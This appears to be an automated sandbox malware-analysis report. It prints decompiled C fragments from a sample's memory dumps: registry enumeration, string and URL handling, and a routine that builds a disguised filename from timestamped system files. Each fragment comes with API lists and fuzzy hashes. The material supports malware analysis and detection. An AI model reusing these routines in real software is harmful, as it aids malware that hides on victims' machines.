                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: invalid string position$string too long
                        • API String ID: 0-4289949731
                        • Opcode ID: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
                        • Instruction ID: c795425772d4481170a3156d10eee275040ecbde49d1507ff864223a7b335452
                        • Opcode Fuzzy Hash: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
                        • Instruction Fuzzy Hash: 0031F6323057619B8624DE5DDC8885FB3EAEFE5755730892FE555C3E90EB309C088BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E00507360(void* __ecx, intOrPtr _a4) {
                        				char _v8;
                        				char _v12;
                        				long _v16;
                        				intOrPtr _v20;
                        				long _v24;
                        				intOrPtr _v28;
                        				void* _v32;
                        				intOrPtr _t35;
                        				intOrPtr _t47;
                        				void* _t51;
                        				void* _t53;
                        
                        				_t51 = __ecx;
                        				_v8 = 0;
                        				_v16 = 0;
                        				_v12 = 0;
                        				_v24 = 0;
                        				_t53 =  *0x50a0ec(0x80000003, 0, 0, 0x20019,  &_v32);
                        				if(_t53 != 0) {
                        					L18:
                        					return _t53;
                        				}
                        				_t53 = 8;
                        				_t35 = E00505C4E(0x104);
                        				_v28 = _t35;
                        				if(_t35 == 0) {
                        					L17:
                        					RegCloseKey(_v32);
                        					goto L18;
                        				}
                        				_v20 = 0x104;
                        				do {
                        					_v16 = _v20;
                        					_v12 = 0x104;
                        					_t53 =  *0x50a0ac(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0);
                        					if(_t53 != 0xea) {
                        						if(_t53 != 0) {
                        							L14:
                        							if(_t53 == 0x103) {
                        								_t53 = 0;
                        							}
                        							L16:
                        							E00502A03(_v28);
                        							goto L17;
                        						}
                        						_t53 = E0050202E(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4);
                        						if(_t53 != 0) {
                        							goto L14;
                        						}
                        						goto L12;
                        					}
                        					if(_v12 <= 0x104) {
                        						if(_v16 <= _v20) {
                        							goto L16;
                        						}
                        						E00502A03(_v24);
                        						_v20 = _v16;
                        						_t47 = E00505C4E(_v16);
                        						_v24 = _t47;
                        						if(_t47 != 0) {
                        							L6:
                        							_t53 = 0;
                        							goto L12;
                        						}
                        						_t53 = 8;
                        						goto L16;
                        					}
                        					_v8 = _v8 + 1;
                        					goto L6;
                        					L12:
                        				} while (WaitForSingleObject( *0x50a2c4, 0) == 0x102);
                        				goto L16;
                        			}

                        APIs
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • WaitForSingleObject.KERNEL32(00000000,?,?,?,00507319,?,00507319,?,?,?,?,?,00507319,?), ref: 0050743A
                        • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00507319,?,?,?,?,?,00501C40,?), ref: 00507462
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AllocateCloseHeapObjectSingleWait
                        • String ID: ~P
                        • API String ID: 1423275866-1055297808
                        • Opcode ID: 2a3c85f05073546864b78d407984a60b21b767faa47cff2d7ea011b9150cca7c
                        • Instruction ID: 494d11c021be082931edb4e4acf6f5c07e1ea25876e094aa1d520f423131162f
                        • Opcode Fuzzy Hash: 2a3c85f05073546864b78d407984a60b21b767faa47cff2d7ea011b9150cca7c
                        • Instruction Fuzzy Hash: 38311A75D0421EABDF21AF95DC899EEFFB9FB98300F104466E911B21A1D2B11E40EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 4104443479-4289949731
                        • Opcode ID: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
                        • Instruction ID: 6b489546f67fcc1e528ea1aaf8e65faa681cc96b19b8ea28819d814c21bc4a01
                        • Opcode Fuzzy Hash: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
                        • Instruction Fuzzy Hash: 5811BE312016809BD7348E9C9D90D1AB7FAEFE17157308D1FE59187E81DB61EC448BA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C54DDE3
                        • ___raise_securityfailure.LIBCMT ref: 6C54DECA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: 8hQl
                        • API String ID: 3761405300-3048985772
                        • Opcode ID: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
                        • Instruction ID: 309a96cdf358faca62b396b71d52472f38f5d85a840db38bbd76cbfcf8851ae1
                        • Opcode Fuzzy Hash: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
                        • Instruction Fuzzy Hash: 9B2115B4600289DFEF00CF1DD9867A07BF8FB4A756F12412AE9098BBA0E7B15484CF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 005023D6
                          • Part of subcall function 00507471: SysFreeString.OLEAUT32(?), ref: 00507550
                        • SafeArrayDestroy.OLEAUT32(?), ref: 00502423
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: ArraySafe$CreateDestroyFreeString
                        • String ID: -tP
                        • API String ID: 3098518882-4025278887
                        • Opcode ID: a7ad388b6f866dd8c3e52482f195fb03077d936d193f50a4e2d353652a4d109e
                        • Instruction ID: 2e8da035aa1f94204e8df4c17f6b8c2aa601ce3096762821752464a02f0025e4
                        • Opcode Fuzzy Hash: a7ad388b6f866dd8c3e52482f195fb03077d936d193f50a4e2d353652a4d109e
                        • Instruction Fuzzy Hash: F9113C76A0050EBFDF01DFA5CC89AEEBBB9FB18310F008065FA01A6161E3719A15DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(?), ref: 005031DA
                          • Part of subcall function 00507471: SysFreeString.OLEAUT32(?), ref: 00507550
                        • SysFreeString.OLEAUT32(00000000), ref: 0050321A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$Free$Alloc
                        • String ID: -tP
                        • API String ID: 986138563-4025278887
                        • Opcode ID: fb6ff40e7f75228aff7b23653384d8fe2255e9584882dd657a43a269057d4493
                        • Instruction ID: 1854bae0d240257b013bb9b3f298a10bc260f573d85ea9c79446e4dd0e4d4381
                        • Opcode Fuzzy Hash: fb6ff40e7f75228aff7b23653384d8fe2255e9584882dd657a43a269057d4493
                        • Instruction Fuzzy Hash: 7101A23650010EBBDB109F69DC488EF7BB8FF88310B004021F905A6120E3709A19DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 16%
                        			E0050110A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                        				void* _t11;
                        				void* _t15;
                        
                        				_t11 =  *0x50a0c0(_a4, _a12,  &_a12);
                        				_t15 = _t11;
                        				if(_t15 == 0) {
                        					_t15 =  *0x50a0c8(_a12, _a16, _t11, _a8, _a20, _a24);
                        					RegCloseKey(_a12);
                        				}
                        				return _t15;
                        			}

                        APIs
                        • RegCloseKey.ADVAPI32(005020DE,?,00505C49,80000002,00000003,005020DE,?,?,?,?,?,00504BED,00000000,00000000,80000002,00000000), ref: 0050113F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Close
                        • String ID: "{P$-tP
                        • API String ID: 3535843008-2739258846
                        • Opcode ID: 37f7acc683dd27f423a7e77a8070a414e0ae4ed6f20c87727c402a892ab4a824
                        • Instruction ID: f414fb5cfd5932ae389d697e34e8e3830c78a148c485d72a28ccedec4a433ae9
                        • Opcode Fuzzy Hash: 37f7acc683dd27f423a7e77a8070a414e0ae4ed6f20c87727c402a892ab4a824
                        • Instruction Fuzzy Hash: 04E0527650025EAFDF125F94EC188EE3FAAFB18791B044421FE1592260D732C934EB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507
                          • Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                        • String ID: invalid string position$string too long
                        • API String ID: 657562460-4289949731
                        • Opcode ID: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
                        • Instruction ID: 7db93f48d6cf20c6cfe000af4f046df2468a94e9eacf95f9d4b19c1418d6e885
                        • Opcode Fuzzy Hash: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
                        • Instruction Fuzzy Hash: 6FD09B75701145866B1C45B44C159AF5194CBA031DF3489399627CAE91D725E8544157
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E00502956(void* __ecx) {
                        				struct _FILETIME _v12;
                        				void* _t6;
                        
                        				GetSystemTimeAsFileTime( &_v12);
                        				_t3 =  &(_v12.dwHighDateTime); // 0x5061ef
                        				_push(0);
                        				_t6 = _v12.dwLowDateTime + 0x2ac18000;
                        				_push(0x989680);
                        				asm("adc ecx, 0xfe624e21");
                        				_push( *_t3);
                        				_push(_t6);
                        				L00507F50();
                        				return _t6;
                        			}

                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,00000000,005061EF), ref: 0050295F
                        • _aulldiv.NTDLL(-2AC18000,aP,00989680,00000000), ref: 0050297F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Time$FileSystem_aulldiv
                        • String ID: aP
                        • API String ID: 2806457037-4089225102
                        • Opcode ID: d5a578bffeae6ae84ae30bbb0d61ef6e96e334874d6cbb1a040f451e140d3a28
                        • Instruction ID: d93e753b777cbbbcc810c50d1fd73ec2dac0c637cf380a0ec5a36f490a2832f2
                        • Opcode Fuzzy Hash: d5a578bffeae6ae84ae30bbb0d61ef6e96e334874d6cbb1a040f451e140d3a28
                        • Instruction Fuzzy Hash: 79D09BB5D1430D77DB04D7D0DC9EF9EB76CE748649F040554B501A2641E574F5049720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::exception::exception.LIBCMT ref: 6C54219D
                          • Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939
                        • __CxxThrowException@8.LIBCMT ref: 6C5421B2
                          • Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                        • String ID: |'Ql
                        • API String ID: 757275642-3658207547
                        • Opcode ID: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
                        • Instruction ID: 0606890895c61653aa72ed7b41f8e311aa37effed93cf402e43c53eb2694b090
                        • Opcode Fuzzy Hash: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
                        • Instruction Fuzzy Hash: 69D06775C0020DBB8B04EFA5DC899CEBBBCEA48244F40C466A914A7A01E734A6488F94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00507B36() {
                        
                        				E00507C36(0x509324, 0x50a0d0);
                        				goto __eax;
                        			}

                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 00507B0F
                          • Part of subcall function 00507C36: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00507CAF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: ExceptionHelper2@8LoadRaise___delay
                        • String ID: "{P$6{P
                        • API String ID: 123106877-883856768
                        • Opcode ID: f69bd5d6cdf1f519823749d97203f667182ea7db46ff6c84e11ab75ddc4374aa
                        • Instruction ID: 89814c76bf03bd702fd3e2b67303b70a90cb3fb9e26367c40ab99547f124d756
                        • Opcode Fuzzy Hash: f69bd5d6cdf1f519823749d97203f667182ea7db46ff6c84e11ab75ddc4374aa
                        • Instruction Fuzzy Hash: 86B012D6A5C60EBCF2245208AD0ED3F4E8CF3C8B10730481AF005C41C1E8803C001172
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00502FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                        				intOrPtr* _v8;
                        				void* _t17;
                        				intOrPtr* _t22;
                        				void* _t27;
                        				char* _t30;
                        				void* _t33;
                        				void* _t34;
                        				void* _t36;
                        				void* _t37;
                        				void* _t39;
                        				int _t42;
                        
                        				_t17 = __eax;
                        				_t37 = 0;
                        				__imp__(_a4, _t33, _t36, _t27, __ecx);
                        				_t2 = _t17 + 1; // 0x1
                        				_t28 = _t2;
                        				_t34 = E00505C4E(_t2);
                        				if(_t34 != 0) {
                        					_t30 = E00505C4E(_t28);
                        					if(_t30 == 0) {
                        						E00502A03(_t34);
                        					} else {
                        						_t39 = _a4;
                        						_t22 = E005079AC(_t39);
                        						_v8 = _t22;
                        						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                        							_a4 = _t39;
                        						} else {
                        							_t26 = _t22 + 2;
                        							_a4 = _t22 + 2;
                        							_t22 = E005079AC(_t26);
                        							_v8 = _t22;
                        						}
                        						if(_t22 == 0) {
                        							__imp__(_t34, _a4);
                        							 *_t30 = 0x2f;
                        							 *((char*)(_t30 + 1)) = 0;
                        						} else {
                        							_t42 = _t22 - _a4;
                        							memcpy(_t34, _a4, _t42);
                        							 *((char*)(_t34 + _t42)) = 0;
                        							__imp__(_t30, _v8);
                        						}
                        						 *_a8 = _t34;
                        						_t37 = 1;
                        						 *_a12 = _t30;
                        					}
                        				}
                        				return _t37;
                        			}

                        APIs
                        • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,005056E5,00000000,00000000,00000000,02FE9698,?,?,00503B82,?,02FE9698), ref: 00503008
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                          • Part of subcall function 005079AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00503036,00000000,00000001,00000001,?,?,005056E5,00000000,00000000,00000000,02FE9698), ref: 005079BA
                          • Part of subcall function 005079AC: StrChrA.SHLWAPI(?,0000003F,?,?,005056E5,00000000,00000000,00000000,02FE9698,?,?,00503B82,?,02FE9698,0000EA60,?), ref: 005079C4
                        • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005056E5,00000000,00000000,00000000,02FE9698,?,?,00503B82), ref: 00503066
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503076
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503082
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                        • String ID:
                        • API String ID: 3767559652-0
                        • Opcode ID: 15f36b60076e25c883607b5bc3b5cca5ac5a9451088dc0dfff7bf726435acaa3
                        • Instruction ID: cd62731183470e673d872ce26cb90f2e402b7fce6069a2fdde27a3fd79ceec71
                        • Opcode Fuzzy Hash: 15f36b60076e25c883607b5bc3b5cca5ac5a9451088dc0dfff7bf726435acaa3
                        • Instruction Fuzzy Hash: D721C07250125AAFCB129F65CC5CAAF7FACBF56380B054054F8049B292D771CA0097A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00504DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                        				void* _v8;
                        				void* _t18;
                        				int _t25;
                        				int _t29;
                        				int _t34;
                        
                        				_t29 = lstrlenW(_a4);
                        				_t25 = lstrlenW(_a8);
                        				_t18 = E00505C4E(_t25 + _t29 + _t25 + _t29 + 2);
                        				_v8 = _t18;
                        				if(_t18 != 0) {
                        					_t34 = _t29 + _t29;
                        					memcpy(_t18, _a4, _t34);
                        					_t10 = _t25 + 2; // 0x2
                        					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                        				}
                        				return _v8;
                        			}

                        APIs
                        • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,02FE932C,?,00504ABB,004F0053,02FE932C,?,?,?,?,?,?,00501BD5), ref: 00504DD8
                        • lstrlenW.KERNEL32(00504ABB,?,00504ABB,004F0053,02FE932C,?,?,?,?,?,?,00501BD5), ref: 00504DDF
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00504ABB,004F0053,02FE932C,?,?,?,?,?,?,00501BD5), ref: 00504DFF
                        • memcpy.NTDLL(73B769A0,00504ABB,00000002,00000000,004F0053,73B769A0,?,?,00504ABB,004F0053,02FE932C), ref: 00504E12
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlenmemcpy$AllocateHeap
                        • String ID:
                        • API String ID: 2411391700-0
                        • Opcode ID: b2f2b4a292aeb49eb1163be718b7042bb66d5dea556af9221795d4f63c609b19
                        • Instruction ID: 3d00f74e7d84344a5192a1ec8639cb8a8a893864229ae8c3f13c41596332e9ee
                        • Opcode Fuzzy Hash: b2f2b4a292aeb49eb1163be718b7042bb66d5dea556af9221795d4f63c609b19
                        • Instruction Fuzzy Hash: 05F0EC76900119BBCB11DFA9CC49C9E7BACFF49394B154062BD04D7112E771EA149BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • lstrlen.KERNEL32(02FE887A,00000000,00000000,00000000,00506328,00000000), ref: 00502839
                        • lstrlen.KERNEL32(?), ref: 00502841
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • lstrcpy.KERNEL32(00000000,02FE887A), ref: 00502855
                        • lstrcat.KERNEL32(00000000,?), ref: 00502860
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                        • String ID:
                        • API String ID: 74227042-0
                        • Opcode ID: a78ea30d9b44cb557a3d7519215b643af7c7168c40178944453171a5a04d74e3
                        • Instruction ID: afe58560d183cdd080e4d08e4aba2e70881cef5cb97f5d6d25db4020092ad7a3
                        • Opcode Fuzzy Hash: a78ea30d9b44cb557a3d7519215b643af7c7168c40178944453171a5a04d74e3
                        • Instruction Fuzzy Hash: 13E0927390166167C7115BA59C4CC9FBBACFFE96517044816FA00D3115C72488099BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        C-Code - Quality: 93%
                        			E04774E9C(signed char* __eax, intOrPtr* _a4) {
                        				signed int _v12;
                        				void* _v16;
                        				CHAR* _v20;
                        				struct _FILETIME _v28;
                        				void* _v32;
                        				void* _v36;
                        				char* _v40;
                        				signed int _v44;
                        				long _v344;
                        				struct _WIN32_FIND_DATAA _v368;
                        				signed int _t72;
                        				void* _t74;
                        				signed int _t76;
                        				void* _t78;
                        				intOrPtr _t81;
                        				CHAR* _t83;
                        				void* _t85;
                        				signed char _t89;
                        				signed char _t91;
                        				intOrPtr _t93;
                        				void* _t96;
                        				long _t99;
                        				int _t101;
                        				signed int _t109;
                        				char* _t111;
                        				void* _t113;
                        				int _t119;
                        				char _t128;
                        				void* _t134;
                        				signed int _t136;
                        				char* _t139;
                        				signed int _t140;
                        				char* _t141;
                        				char* _t146;
                        				signed char* _t148;
                        				int _t151;
                        				void* _t152;
                        				void* _t153;
                        				void* _t154;
                        				void* _t165;
                        
                        				_v12 = _v12 & 0x00000000;
                        				_t148 = __eax;
                        				_t72 =  *0x477a2cc; // 0x63699bc3
                        				_t74 = RtlAllocateHeap( *0x477a290, 0, _t72 ^ 0x63699ac7);
                        				_v20 = _t74;
                        				if(_t74 == 0) {
                        					L36:
                        					return _v12;
                        				}
                        				_t76 =  *0x477a2cc; // 0x63699bc3
                        				_t78 = RtlAllocateHeap( *0x477a290, 0, _t76 ^ 0x63699bce);
                        				_t146 = 0;
                        				_v36 = _t78;
                        				if(_t78 == 0) {
                        					L35:
                        					HeapFree( *0x477a290, _t146, _v20);
                        					goto L36;
                        				}
                        				_t136 =  *0x477a2cc; // 0x63699bc3
                        				memset(_t78, 0, _t136 ^ 0x63699bce);
                        				_t81 =  *0x477a2d0; // 0x96d5a8
                        				_t154 = _t153 + 0xc;
                        				_t5 = _t81 + 0x477b825; // 0x73797325
                        				_t83 = E04771000(_t5);
                        				_v20 = _t83;
                        				if(_t83 == 0) {
                        					L34:
                        					HeapFree( *0x477a290, _t146, _v36);
                        					goto L35;
                        				}
                        				_t134 = 0xffffffffffffffff;
                        				_v28.dwLowDateTime = 0x63699bce;
                        				_v28.dwHighDateTime = 0x63699bce;
                        				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                        				_v32 = _t85;
                        				if(_t85 != 0x63699bce) {
                        					GetFileTime(_t85,  &_v28, 0, 0);
                        					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                        					asm("adc dword [ebp-0x14], 0xc9"); // executed
                        					FindCloseChangeNotification(_v32); // executed
                        				}
                        				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                        				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                        				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                        				 *_t148 = _t91;
                        				_v32 = _t91 & 0x000000ff;
                        				_t93 =  *0x477a2d0; // 0x96d5a8
                        				_t16 = _t93 + 0x477b846; // 0x642e2a5c
                        				_v40 = _t146;
                        				_v44 = _t89 & 0x000000ff;
                        				__imp__(_v20, _t16);
                        				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                        				_v16 = _t96;
                        				if(_t96 == _t134) {
                        					_t146 = 0;
                        					goto L34;
                        				}
                        				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                        				while(_t99 > 0) {
                        					_t101 = FindNextFileA(_v16,  &_v368); // executed
                        					if(_t101 == 0) {
                        						FindClose(_v16);
                        						_v16 = FindFirstFileA(_v20,  &_v368);
                        						_v28.dwHighDateTime = _v344;
                        						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                        					}
                        					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                        				}
                        				_v12 = _v12 & 0x00000000;
                        				while(1) {
                        					_t109 = _v44;
                        					if(_v12 <= _t109) {
                        						goto L15;
                        					}
                        					_t140 = _v12;
                        					if(_t140 > _v32) {
                        						_t141 = _v36;
                        						 *_a4 = _t141;
                        						while(1) {
                        							_t128 =  *_t141;
                        							if(_t128 == 0) {
                        								break;
                        							}
                        							if(_t128 < 0x30) {
                        								 *_t141 = _t128 + 0x20;
                        							}
                        							_t141 = _t141 + 1;
                        						}
                        						_v12 = 1;
                        						FindClose(_v16); // executed
                        						_t146 = 0;
                        						goto L35;
                        					}
                        					_t165 = _t140 - _t109;
                        					L15:
                        					if(_t165 == 0 || _v12 == _v32) {
                        						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                        						_t139 = _v40;
                        						_t151 = _t111 -  &(_v368.cFileName);
                        						_t113 = 0;
                        						if(_t139 != 0) {
                        							_t48 = _t151 - 4; // -4
                        							_t113 = _t48;
                        							if(_t113 > _t151) {
                        								_t113 = 0;
                        							}
                        						}
                        						if(_t151 > 4) {
                        							_t151 = 4;
                        						}
                        						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                        						_t154 = _t154 + 0xc;
                        						_v40 =  &(_v40[_t151]);
                        					}
                        					do {
                        						_t119 = FindNextFileA(_v16,  &_v368); // executed
                        						if(_t119 == 0) {
                        							FindClose(_v16);
                        							_v16 = FindFirstFileA(_v20,  &_v368);
                        						}
                        					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                        					_v12 = _v12 + 1;
                        				}
                        			}

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,63699BC3,0477A380), ref: 04774EC7
                        • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04774EE9
                        • memset.NTDLL ref: 04774F03
                          • Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,04774F1C,73797325), ref: 04771011
                          • Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0477102B
                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04774F41
                        • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04774F55
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04774F6C
                        • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04774F78
                        • lstrcat.KERNEL32(?,642E2A5C), ref: 04774FB9
                        • FindFirstFileA.KERNELBASE(?,?), ref: 04774FCF
                        • CompareFileTime.KERNEL32(?,?), ref: 04774FED
                        • FindNextFileA.KERNELBASE(04773EAC,?), ref: 04775001
                        • FindClose.KERNEL32(04773EAC), ref: 0477500E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0477501A
                        • CompareFileTime.KERNEL32(?,?), ref: 0477503C
